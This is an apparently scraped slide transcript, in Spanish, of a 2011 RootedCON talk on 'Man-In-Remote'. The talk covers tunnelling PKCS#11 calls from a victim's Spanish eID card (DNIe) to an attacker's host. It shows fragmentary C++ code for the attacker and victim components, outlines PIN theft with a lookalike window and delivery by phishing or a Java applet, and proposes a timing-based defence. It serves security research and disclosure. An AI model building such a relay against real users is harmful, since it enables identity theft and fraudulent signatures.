gabriel gonzalez - man-in-remote: pkcs11 for fun and non-profit [rootedcon 2011]
TRANSCRIPT
![Page 1: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/1.jpg)
Otros usos de PKCS#11 y
el DNIe
![Page 2: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/2.jpg)
Guión
• Introducción al DNIe
• Man In Remote
• Demo en Directo
• MiR Reloaded
• Solución
![Page 3: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/3.jpg)
Introducción al DNIe
• Microprocesador genérico
• Criptoprocesador
• Comunicaciones vía puerto serie
![Page 4: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/4.jpg)
Introducción al DNIe
• Sistema Biométrico: Match On Card
• Certificado Autenticación
• Certificado No Repudio
• Certificado Componente
![Page 5: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/5.jpg)
Introducción al DNIe
• PC / SC
– Integración de SmartCards en PCs
– API de comunicaciones
– Multiplataforma
– Funcionalidad
• Inicialización
• Gestión de Lectores
• Conexión / Estado
• Envío de comandos (APDUs)
![Page 6: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/6.jpg)
Introducción al DNIe
• Canal Seguro
– Norma UNE 14890
– Utilizado para cifrar los comandos
– Ambos extremos se autentican mutuamente
• Intercambian claves públicas
• Autenticación
• Derivación de claves del canal
![Page 7: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/7.jpg)
Introducción al DNIe
• CSP
– Propuestas de Microsoft
– Extensiones a la CryptoAPIPC / SC
CSP
Aplicaciones
Lector DNIe
![Page 8: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/8.jpg)
Introducción al DNIe
• PKCS#11
– Estandar creado por RSA (http://www.rsa.com/rsalabs/node.asp?id=2133)
– API genérico para acceder a crypto-devices
– Token como unidad de acceso
– Gestiona varios objetos
• Claves Públicas, Privadas
• Datos y Certificados
PC / SC
PKCS#11
Aplicaciones
Lector DNIe
![Page 9: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/9.jpg)
Introducción al DNIe
• Autenticación en Servicios Web
– Applet Java
• Más Intrusivo
– SSL + Certificado Cliente
• “Transparente”
![Page 10: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/10.jpg)
Introducción al DNIe
• Applet Java
– Se necesita la descarga de un Applet Java
– Aparecerán mensajes de seguridad
![Page 11: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/11.jpg)
Introducción al DNIe
DNIe Navegador OCSPWeb Server
Get Client Cert
Get Auth Cert
Validate PIN
Validate Cert
Init Session
Sign Msgs
![Page 12: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/12.jpg)
Introducción al DNIe
• Seguridad
– Sensores de alimentación
– Detección de glitches
– Capa metálica de pasivación
– Detección cambios de frecuencia del reloj
– Detección cambios en la tensión
• Nivel EAL4+
![Page 13: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/13.jpg)
Man In Remote
• Motivación
• Definición
• Descripción
• Demo
![Page 14: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/14.jpg)
Man In Remote
• Motivación
– Sistemas que utilizan Dispositivos Físicos
– Duplicación
– Autenticación Remota
![Page 15: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/15.jpg)
Man In Remote
• Definición
Permite hacer uso en vivo de lasfuncionalidades proporcionadas por undispositivo de seguridad en un Host diferentedel que está instalado
![Page 16: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/16.jpg)
Man In Remote
• Descripción: Actores
– 48Banks
– Amián
– La Nuri
![Page 17: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/17.jpg)
Man In Remote
Web
Browser
PKCS#11
![Page 18: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/18.jpg)
Man In Remote
PKCS#11
Tunneling
MiR
PKCS#11
Web
Browser
MiR
PKCS#11
![Page 19: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/19.jpg)
Man In Remote
PKCS#11
Tunneling
MiR
PKCS#11
Web
Browser
MiR
PKCS#11
![Page 20: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/20.jpg)
Man In Remote
• MiR - Atacante
– Librería con Interfaz PKCS#11
– No realiza operaciones locales
– Interfaz de un Objeto Remoto
![Page 21: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/21.jpg)
Man In Remote
• MiR - Atacante
1. Empaqueta Datos
2. Invoca Operaciones
3. Desempaqueta resultados
![Page 22: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/22.jpg)
Man In Remote
• MiR - Víctima
– Cliente de la librería PKCS#11 válida
– Espera peticiones del atacante
– Objeto Remoto
![Page 23: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/23.jpg)
Man In Remote
• MiR - Víctima
1. Desempaqueta Datos
2. Invoca Operaciones en la librería PKCS#11
3. Recoge resultados y los Empaqueta de vuelta
![Page 24: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/24.jpg)
Man In Remote - Attacker’s Src
CK_DEFINE_FUNCTION(CK_RV,C_Initialize)(…)
{
#ifdef _REMOTE_PKCS11_
{
DataMarshalling *d = NULL;
[…]
if (connect(client, (struct sockaddr *)&sock, sizeof(sock))
== SOCKET_ERROR) {[…]}
d = new DataMarshalling(client);
d->setMsgType("C_Initialize");
d->packInt((char *)&a);
d->sendData();
delete d;
}
![Page 25: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/25.jpg)
Man In Remote - Attacker’s Src
#else
InicializarFunciones("UsrPKCS11.dll");
rv = pFunctionList->C_Initialize(pInitArgs);
#endif
#ifdef _DEBUG_PKCS11_
fprintf(fout, "C_Initialize ret: %d\n", rv);
#endif
exit:
return rv;
}
![Page 26: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/26.jpg)
Man In Remote - Attacker’s Src
CK_DEFINE_FUNCTION(CK_RV,C_OpenSession)()
{
CK_RV rv = CKR_OK;
DataMarshalling *d = new DataMarshalling(client);
d->setMsgType("C_OpenSession");
{
/*
* Open session
*/
unsigned int sessionId = 0;
DataMarshalling *d2 = new DataMarshalling(client);
d->packInt((char *)&slotID);
d->packInt((char *)&flags);
d->sendData();
![Page 27: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/27.jpg)
Man In Remote - Attacker’s Src
d2->recvData();
if (strcmp(d2->getMsgType(), d->getMsgType())) {
rv = CKR_CANCEL;
goto exit;
}
rv = d2->unpackInt();
sessionId = d2->unpackInt();
delete d2;
*phSession = sessionId;
}
delete d;
exit:
return rv;
}
![Page 28: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/28.jpg)
Man In Remote - Victim’s Src
} else if (!strcmp(d->getMsgType(), "C_OpenSession")) {
slotId = d->unpackInt();
flags = d->unpackInt();
{
DataMarshalling *d2 = new DataMarshalling(client);
/*
* Opening session
*/
ret = C_OpenSession(slotId, flags, NULL, NULL, &sessionId);
d2->setMsgType(d->getMsgType());
d2->packInt((char *)&ret);
d2->packInt((char *)&sessionId);
d2->sendData();
delete d2;
}
}
![Page 29: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/29.jpg)
Man In Remote - Live Demo!
MiR
PKCS#11
MiR
PKCS#11PKCS#11
Tunneling
Web
Browser
Seguridad Social
![Page 30: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/30.jpg)
Man In Remote
• Problemas
– Obtención del PIN
– Confirmación al realizar Firma Electrónica
– Infección del dispositivo objetivo
![Page 31: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/31.jpg)
Man In Remote
• Obtención del PIN
– Mostrar Ventana Idéntica
![Page 32: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/32.jpg)
Man In Remote
• Confirmación al realizar Firma
![Page 33: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/33.jpg)
Man In Remote
• Confirmación al realizar Firma
![Page 34: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/34.jpg)
Man In Remote
• Infección Dispositivo Objetivo
– User-land sin privilegios
– Ingeniería Social
– Exploit
![Page 35: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/35.jpg)
MiR Reloaded
• Thanks Java!
• Security Warning
![Page 36: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/36.jpg)
MiR Reloaded
• Java Version
– Sun PKCS#11
– Distribución como Phishing
– iframe + applet
![Page 37: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/37.jpg)
MiR Reloaded
• Hasta ahora hemos conseguido
– Autenticarnos remotamente
– Firmar Remotamente
– Atacante con PIN puede usar nuestro DNIe
![Page 38: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/38.jpg)
MiR Reloaded
• Segundo método de autenticación: Applet
– Firmar un Token
– Enviar token firmado en una petición Post
– No se necesita túnel pkcs#11
– Enviar token y devolverlo firmado
![Page 39: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/39.jpg)
MiR Reloaded
Web Browser
<form>
<input id=“token”
value=“AAAAAA”>
</form>
<form>
<input id=“token”
value=“903234”>
</form>
![Page 40: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/40.jpg)
MiR Reloaded
Phishing /
Trojan
Web Browser
<form>
<input id=“token”
value=“AAAAAA”>
</form>
1 Token
2 Signed Token
<form>
<input id=“token”
value=“903234”>
</form>
![Page 41: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/41.jpg)
MiR: Solución
• Solución Compleja
• No podemos confiar en el PC
• El servidor no puede verificar nada extra
• Las Smart Cards no son tan “smart”
![Page 42: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/42.jpg)
MiR: Solución
• Solución basada en tiempos de respuesta
• Tiempos fijos de procesamiento
• Latencia de la red
• Se consigue abortar un posible ataque
![Page 43: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/43.jpg)
MiR: Solución
Local
Processing
localRpRR tttt )( 121
1Rt
2Rt
)( 1Rpt
![Page 44: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/44.jpg)
MiR: Solución
Local
Processing
RTTlocalRpRR ttttt 2)( 121
)( 1Rpt
1RtRTTt
RTTt2Rt
MiR
![Page 45: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/45.jpg)
MiR: Solución
RTTlocalRpRR ttttt 2)( 121
localRpRR tttt )( 121
2121 RRRR tttt
![Page 46: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/46.jpg)
MiR: “Is this real Life?”
• Noticias sobre ataques similares
– http://www.itworld.com/security/134958/smart-cards-no-match-online-spies
• Nunca hay que relajar el nivel de alerta
![Page 47: Gabriel Gonzalez - Man-In-Remote: PKCS11 for fun and non-profit [RootedCON 2011]](https://reader033.vdocuments.site/reader033/viewer/2022052911/559dd4291a28ab47318b456c/html5/thumbnails/47.jpg)